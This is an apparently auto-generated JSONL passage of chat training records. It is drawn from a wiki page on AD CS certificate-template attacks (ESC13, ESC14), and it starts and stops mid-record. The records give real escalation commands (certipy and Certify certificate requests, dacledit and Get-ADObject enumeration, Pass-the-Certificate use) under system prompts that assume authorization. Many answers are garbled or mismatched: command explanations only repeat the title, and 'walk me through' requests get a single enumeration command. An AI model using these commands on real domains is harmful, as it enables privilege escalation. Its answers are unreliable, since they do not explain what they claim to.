\"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Vulnerable template'\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the controlled principal, but with its privileges added to those of the linked group.\n\n=== Windows\n\nFrom Windows systems, the ActiveDirectory PowerShell module can be used to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-P"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate templates - (ESC13) Issuance policiy with privileged group linked", "response": "For a group to be linked to an issuance policy via msDS-OIDToGroupLink it must meet two requirements:\n\n* Be empty\n* Have a universal scope, i.e. be \"Forest Wide\". By default, \"Forest Wide\" groups are \"Enterprise Read-only Domain Controllers\", \"Enterprise Key Admins\", \"Enterprise Admins\" and \"Schema Admins\"\n\nSo, if a user or a computer can enroll on a template that specifies an issuance policy linked to a highly privileged group, the issued certificate privilegies will be mapped to those of the group.\n\nTo exploit ESC13, here are the requirements:\n\n* The controlled principal can enroll to the template and meets all the required issuance policies\n* The template specifies an issuance policy\n* This policy is linked to a privileged groups via msDS-OIDToGroupLink\n* The template allows the Client Authentication in its EKU\n* All the usual requirements\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) permits to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-Policy property not empty. Additionally, it verifies if this issuance policy has an OID group link to a group in the property msDS-OIDToGroupLink.\n\n``bash\ncertipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'\n`\n\nIf a vulnerable template is found, there is no particular issuance requirement, the principal can enroll, and the template indicates the Client Authentication EKU, request a certificate for this template with Certipy (Python) as usual:\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Vulnerable template'\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the controlled principal, but with its privileges added to those of the linked group.\n\n=== Windows\n\nFrom Windows systems, the ActiveDirectory PowerShell module can be used to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-P", "metadata": {"corpus_index": 95, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC13) Issuance policiy with privileged group linked"}, {"role": "assistant", "content": "For a group to be linked to an issuance policy via msDS-OIDToGroupLink it must meet two requirements:\n\n* Be empty\n* Have a universal scope, i.e. be \"Forest Wide\". By default, \"Forest Wide\" groups are \"Enterprise Read-only Domain Controllers\", \"Enterprise Key Admins\", \"Enterprise Admins\" and \"Schema Admins\"\n\nSo, if a user or a computer can enroll on a template that specifies an issuance policy linked to a highly privileged group, the issued certificate privilegies will be mapped to those of the group.\n\nTo exploit ESC13, here are the requirements:\n\n* The controlled principal can enroll to the template and meets all the required issuance policies\n* The template specifies an issuance policy\n* This policy is linked to a privileged groups via msDS-OIDToGroupLink\n* The template allows the Client Authentication in its EKU\n* All the usual requirements\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) permits to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-Policy property not empty. Additionally, it verifies if this issuance policy has an OID group link to a group in the property msDS-OIDToGroupLink.\n\n``bash\ncertipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'\n`\n\nIf a vulnerable template is found, there is no particular issuance requirement, the principal can enroll, and the template indicates the Client Authentication EKU, request a certificate for this template with Certipy (Python) as usual:\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Vulnerable template'\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the controlled principal, but with its privileges added to those of the linked group.\n\n=== Windows\n\nFrom Windows systems, the ActiveDirectory PowerShell module can be used to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-P"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC13) Issuance policiy with privileged group linked", "response": "For a group to be linked to an issuance policy via msDS-OIDToGroupLink it must meet two requirements:\n\n* Be empty\n* Have a universal scope, i.e. be \"Forest Wide\". By default, \"Forest Wide\" groups are \"Enterprise Read-only Domain Controllers\", \"Enterprise Key Admins\", \"Enterprise Admins\" and \"Schema Admins\"\n\nSo, if a user or a computer can enroll on a template that specifies an issuance policy linked to a highly privileged group, the issued certificate privilegies will be mapped to those of the group.\n\nTo exploit ESC13, here are the requirements:\n\n* The controlled principal can enroll to the template and meets all the required issuance policies\n* The template specifies an issuance policy\n* This policy is linked to a privileged groups via msDS-OIDToGroupLink\n* The template allows the Client Authentication in its EKU\n* All the usual requirements\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this pull request on Certipy (Python) permits to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-Policy property not empty. Additionally, it verifies if this issuance policy has an OID group link to a group in the property msDS-OIDToGroupLink.\n\n``bash\ncertipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'\n`\n\nIf a vulnerable template is found, there is no particular issuance requirement, the principal can enroll, and the template indicates the Client Authentication EKU, request a certificate for this template with Certipy (Python) as usual:\n\n`bash\ncertipy req -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -dc-ip \"$DC_IP\" -target \"$ADCS_HOST\" -ca 'ca_name' -template 'Vulnerable template'\n`\n\nThe certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate as the controlled principal, but with its privileges added to those of the linked group.\n\n=== Windows\n\nFrom Windows systems, the ActiveDirectory PowerShell module can be used to identify a certificate template with an issuance policy, i.e. with the msPKI-Certificate-P", "metadata": {"corpus_index": 95, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the certipy syntax for certificate templates - (esc13) issuance policiy with privileged group linked?"}, {"role": "assistant", "content": "certipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the certipy syntax for certificate templates - (esc13) issuance policiy with privileged group linked?", "response": "certipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'", "metadata": {"corpus_index": 96, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC13) Issuance policiy with privileged group linked?"}, {"role": "assistant", "content": "certipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC13) Issuance policiy with privileged group linked?", "response": "certipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'", "metadata": {"corpus_index": 96, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `certipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `certipy find -u '$USER@$DOMAIN' -p '\"$PASSWORD' -dc-ip '$DC_IP'`?", "response": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked", "metadata": {"corpus_index": 96, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the Get-ADObject command for certificate templates - (esc13) issuance policiy with privileged group linked"}, {"role": "assistant", "content": "Get-ADObject \"CN=\"Vulnerable template\",$TemplateContainer\" -Properties msPKI-Certificate-Policy"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the Get-ADObject command for certificate templates - (esc13) issuance policiy with privileged group linked", "response": "Get-ADObject \"CN=\"Vulnerable template\",$TemplateContainer\" -Properties msPKI-Certificate-Policy", "metadata": {"corpus_index": 97, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-ADObject"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Certificate templates - (ESC13) Issuance policiy with privileged group linked?"}, {"role": "assistant", "content": "Get-ADObject \"CN=\"Vulnerable template\",$TemplateContainer\" -Properties msPKI-Certificate-Policy"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Certificate templates - (ESC13) Issuance policiy with privileged group linked?", "response": "Get-ADObject \"CN=\"Vulnerable template\",$TemplateContainer\" -Properties msPKI-Certificate-Policy", "metadata": {"corpus_index": 97, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-ADObject \"CN=\"Vulnerable template\",$TemplateContainer\" -Properties msPKI-Certificate-Policy`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-ADObject \"CN=\"Vulnerable template\",$TemplateContainer\" -Properties msPKI-Certificate-Policy`?", "response": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked", "metadata": {"corpus_index": 97, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Get-ADObject for certificate templates - (esc13) issuance policiy with privileged group linked?"}, {"role": "assistant", "content": "Get-ADObject \"CN=$POLICY_ID,$OIDContainer\" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Get-ADObject for certificate templates - (esc13) issuance policiy with privileged group linked?", "response": "Get-ADObject \"CN=$POLICY_ID,$OIDContainer\" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink", "metadata": {"corpus_index": 98, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-ADObject"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC13) Issuance policiy with privileged group linked"}, {"role": "assistant", "content": "Get-ADObject \"CN=$POLICY_ID,$OIDContainer\" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC13) Issuance policiy with privileged group linked", "response": "Get-ADObject \"CN=$POLICY_ID,$OIDContainer\" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink", "metadata": {"corpus_index": 98, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-ADObject \"CN=$POLICY_ID,$OIDContainer\" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-ADObject \"CN=$POLICY_ID,$OIDContainer\" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink`?", "response": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked", "metadata": {"corpus_index": 98, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Certificate templates - (ESC13) Issuance policiy with privileged group linked?"}, {"role": "assistant", "content": ".\\Certify.exe request /ca:domain\\ca /template:\"Vulnerable template\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Certificate templates - (ESC13) Issuance policiy with privileged group linked?", "response": ".\\Certify.exe request /ca:domain\\ca /template:\"Vulnerable template\"", "metadata": {"corpus_index": 99, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `.\\Certify.exe request /ca:domain\\ca /template:\"Vulnerable template\"`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `.\\Certify.exe request /ca:domain\\ca /template:\"Vulnerable template\"`?", "response": "This command is used for certificate templates - (esc13) issuance policiy with privileged group linked. (ESC13) Issuance policiy with privileged group linked", "metadata": {"corpus_index": 99, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Certificate templates - (ESC14) Weak explicit mapping"}, {"role": "assistant", "content": "This attack exploits configuration errors when explicit mapping is set up. To understand this ESC, it is essential to have a good command of Certificate mapping.\n\nThere are four possible attack scenarios for exploiting ESC14. In all cases, the following prerequisites must be met:\n\n> [!WARNING]\n> * the attacker has compromised a victim account and is able to request certificates with this account, and wants to compromise a target account\n> * the certificate template allows the victim to enroll\n> * the victim matches all the prerequisites for issuing the certificate\n> * the certificate template allows for authentication\n> * if the template has the value CT_FLAG_SUBJECT_ALT_REQUIRE_UPN or CT_FLAG_SUBJECT_ALT_REQUIRE_SPN in the msPKI-Certificate-Name-Flag attribute, then:\n> * The UseSubjectAltName registry key on the DC must be set to 0\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_DNS or CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS in the msPKI-Certificate-Name-Flag attribute:\n> * the victim must be a machine\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL or CT_FLAG_SUBJECT_REQUIRE_EMAIL in the msPKI-Certificate-Name-Flag attribute, one of the following prerequisites must be validated:\n> * the certificate template uses version 1 of the scheme\n> * the victim has his mail attribute configured\n> * the attacker has write access to the victim's mail attribute\n\nSufficient DACL to write altSecurityIdentities attributes can be detected like this:\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'\n`\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n=== Windows\n\nFrom Windows systems, this can be done with Get-WriteAltSecIDACEs.ps1 (PowerShell)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Certificate templates - (ESC14) Weak explicit mapping", "response": "This attack exploits configuration errors when explicit mapping is set up. To understand this ESC, it is essential to have a good command of Certificate mapping.\n\nThere are four possible attack scenarios for exploiting ESC14. In all cases, the following prerequisites must be met:\n\n> [!WARNING]\n> * the attacker has compromised a victim account and is able to request certificates with this account, and wants to compromise a target account\n> * the certificate template allows the victim to enroll\n> * the victim matches all the prerequisites for issuing the certificate\n> * the certificate template allows for authentication\n> * if the template has the value CT_FLAG_SUBJECT_ALT_REQUIRE_UPN or CT_FLAG_SUBJECT_ALT_REQUIRE_SPN in the msPKI-Certificate-Name-Flag attribute, then:\n> * The UseSubjectAltName registry key on the DC must be set to 0\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_DNS or CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS in the msPKI-Certificate-Name-Flag attribute:\n> * the victim must be a machine\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL or CT_FLAG_SUBJECT_REQUIRE_EMAIL in the msPKI-Certificate-Name-Flag attribute, one of the following prerequisites must be validated:\n> * the certificate template uses version 1 of the scheme\n> * the victim has his mail attribute configured\n> * the attacker has write access to the victim's mail attribute\n\nSufficient DACL to write altSecurityIdentities attributes can be detected like this:\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'\n`\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n=== Windows\n\nFrom Windows systems, this can be done with Get-WriteAltSecIDACEs.ps1 (PowerShell).", "metadata": {"corpus_index": 100, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Certificate templates - (ESC14) Weak explicit mapping"}, {"role": "assistant", "content": "This attack exploits configuration errors when explicit mapping is set up. To understand this ESC, it is essential to have a good command of Certificate mapping.\n\nThere are four possible attack scenarios for exploiting ESC14. In all cases, the following prerequisites must be met:\n\n> [!WARNING]\n> * the attacker has compromised a victim account and is able to request certificates with this account, and wants to compromise a target account\n> * the certificate template allows the victim to enroll\n> * the victim matches all the prerequisites for issuing the certificate\n> * the certificate template allows for authentication\n> * if the template has the value CT_FLAG_SUBJECT_ALT_REQUIRE_UPN or CT_FLAG_SUBJECT_ALT_REQUIRE_SPN in the msPKI-Certificate-Name-Flag attribute, then:\n> * The UseSubjectAltName registry key on the DC must be set to 0\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_DNS or CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS in the msPKI-Certificate-Name-Flag attribute:\n> * the victim must be a machine\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL or CT_FLAG_SUBJECT_REQUIRE_EMAIL in the msPKI-Certificate-Name-Flag attribute, one of the following prerequisites must be validated:\n> * the certificate template uses version 1 of the scheme\n> * the victim has his mail attribute configured\n> * the attacker has write access to the victim's mail attribute\n\nSufficient DACL to write altSecurityIdentities attributes can be detected like this:\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'\n`\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n=== Windows\n\nFrom Windows systems, this can be done with Get-WriteAltSecIDACEs.ps1 (PowerShell)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Certificate templates - (ESC14) Weak explicit mapping", "response": "This attack exploits configuration errors when explicit mapping is set up. To understand this ESC, it is essential to have a good command of Certificate mapping.\n\nThere are four possible attack scenarios for exploiting ESC14. In all cases, the following prerequisites must be met:\n\n> [!WARNING]\n> * the attacker has compromised a victim account and is able to request certificates with this account, and wants to compromise a target account\n> * the certificate template allows the victim to enroll\n> * the victim matches all the prerequisites for issuing the certificate\n> * the certificate template allows for authentication\n> * if the template has the value CT_FLAG_SUBJECT_ALT_REQUIRE_UPN or CT_FLAG_SUBJECT_ALT_REQUIRE_SPN in the msPKI-Certificate-Name-Flag attribute, then:\n> * The UseSubjectAltName registry key on the DC must be set to 0\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_DNS or CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS in the msPKI-Certificate-Name-Flag attribute:\n> * the victim must be a machine\n> * authentication can only be performed via PKINIT (Kerberos)\n> * if the template indicates CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL or CT_FLAG_SUBJECT_REQUIRE_EMAIL in the msPKI-Certificate-Name-Flag attribute, one of the following prerequisites must be validated:\n> * the certificate template uses version 1 of the scheme\n> * the victim has his mail attribute configured\n> * the attacker has write access to the victim's mail attribute\n\nSufficient DACL to write altSecurityIdentities attributes can be detected like this:\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, this can be done with Impacket's dacledit.py (Python).\n\n``bash\ndacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'\n`\n\nIt is also possible to view the necessary DACL in BloodHound.\n\n=== Windows\n\nFrom Windows systems, this can be done with Get-WriteAltSecIDACEs.ps1 (PowerShell).", "metadata": {"corpus_index": 100, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use dacledit.py for certificate templates - (esc14) weak explicit mapping?"}, {"role": "assistant", "content": "dacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use dacledit.py for certificate templates - (esc14) weak explicit mapping?", "response": "dacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'", "metadata": {"corpus_index": 101, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dacledit.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Certificate templates - (ESC14) Weak explicit mapping"}, {"role": "assistant", "content": "dacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Certificate templates - (ESC14) Weak explicit mapping", "response": "dacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'", "metadata": {"corpus_index": 101, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'`?"}, {"role": "assistant", "content": "This command is used for certificate templates - (esc14) weak explicit mapping. (ESC14) Weak explicit mapping"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dacledit.py -action 'read' -principal 'controlled_object' -target 'target_object' 'domain'/'user':'password'`?", "response": "This command is used for certificate templates - (esc14) weak explicit mapping. (ESC14) Weak explicit mapping", "metadata": {"corpus_index": 101, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Get the ACEs for a single object based on DistinguishedName?"}, {"role": "assistant", "content": "Get-WriteAltSecIDACEs -DistinguishedName \"dc=domain,dc=local\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Get the ACEs for a single object based on DistinguishedName?", "response": "Get-WriteAltSecIDACEs -DistinguishedName \"dc=domain,dc=local\"", "metadata": {"corpus_index": 102, "category": "active_directory", "source_file": "docs/src/ad/movement/adcs/certificate-templates.md", "page_title": "Certificate templates", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Get the ACEs for a single object based on DistinguishedName?"}, {"role": "assistant", "content": "Get-WriteAltSecIDACEs -DistinguishedName \"dc=domain,dc=local\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Get the ACEs for a single object based on DistinguishedName?", "response": "Get-WriteAltSecIDACEs -DistinguishedName 